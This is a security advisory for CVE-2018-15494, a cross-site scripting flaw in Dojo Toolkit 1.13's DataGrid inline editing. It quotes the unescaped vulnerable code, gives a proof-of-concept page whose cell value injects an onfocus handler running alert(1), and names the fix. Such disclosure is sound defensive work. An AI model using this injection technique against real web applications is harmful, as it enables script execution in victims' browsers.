Dojo Toolkit 1.13 Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Advisory ID: SYSS-2018-010 Product: Dojo Toolkit Manufacturer: JS Foundation Affected Version(s): 1.13 Tested Version(s): 1.13, 1.10.7 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2018-07-02 Solution Date: 2018-10-13 Public Disclosure: 2018-10-24 CVE Reference: CVE-2018-15494 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Dojo Toolkit is a JavaScript framework for building JavaScript based applications. The manufacturer describes the product as follows (see [1]): "A JavaScript toolkit that saves you time and scales with your development process. Provides everything you need to build a Web app. Language utilities, UI components, and more, all in one place, designed to work together perfectly." Due to improper escaping, applications using Dojo Toolkit may be vulnerable to cross-site scripting. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The inline editing feature of the dojox.grid.DataGrid component fails to properly escape the cell value when using it as the input field's value attribute while editing is activated by clicking. > formatEditing: function(inDatum, inRowIndex){ > this.needFormatNode(inDatum, inRowIndex); > return '<input class="dojoxGridInput" type="text" value="' + inDatum + '">'; > }, That allows additional element attributes to be introduced, including an "onfocus" handler that will immediately get executed when editing mode is activated. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof-of-Concept (PoC): Demo website with Dojo's dojox.grid.DataGrid component: <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <style type="text/css"> @import ""; html, body { width: 100%; height: 100%; } </style> </head> <body> <script type="text/javascript" src=""></script> <script type="text/javascript"> dojo.require("dojox.grid.DataGrid"); dojo.require(""); dojo.addOnLoad(function(){ var g = new dojox.grid.DataGrid({ store: new{ data: {"items" : [ {"foo" : 'bar" onfocus="alert(1)"'} ] } }), structure: [ { field: 'foo', width : '100%', editable: true } ] }); dojo.byId("container").appendChild(g.domNode); g.startup(); }); </script> <div id="container" style="width: 100%; height: 100%;"></div> </body> </html> When clicking the table row to start editing, the cell value is inserted into a text input's value attribute without proper escaping, resulting in markup like <input class="dojoxGridInput" value="bar" onfocus="alert(1)" "="" type="text"> which introduces JavaScript code in the "onfocus" handler that gets immediately executed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to version 1.14 of Dojo Toolkit. More Information: Vendor announcement: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-06-04: Vulnerability discovered 2018-07-02: Vulnerability reported to manufacturer 2018-10-13: Patch released by manufacturer 2018-10-24: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Dojo Toolkit [2] SySS Security Advisory SYSS-2018-010 [3] SySS Responsible Disclosure Policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: Public Key: :// Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL:

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top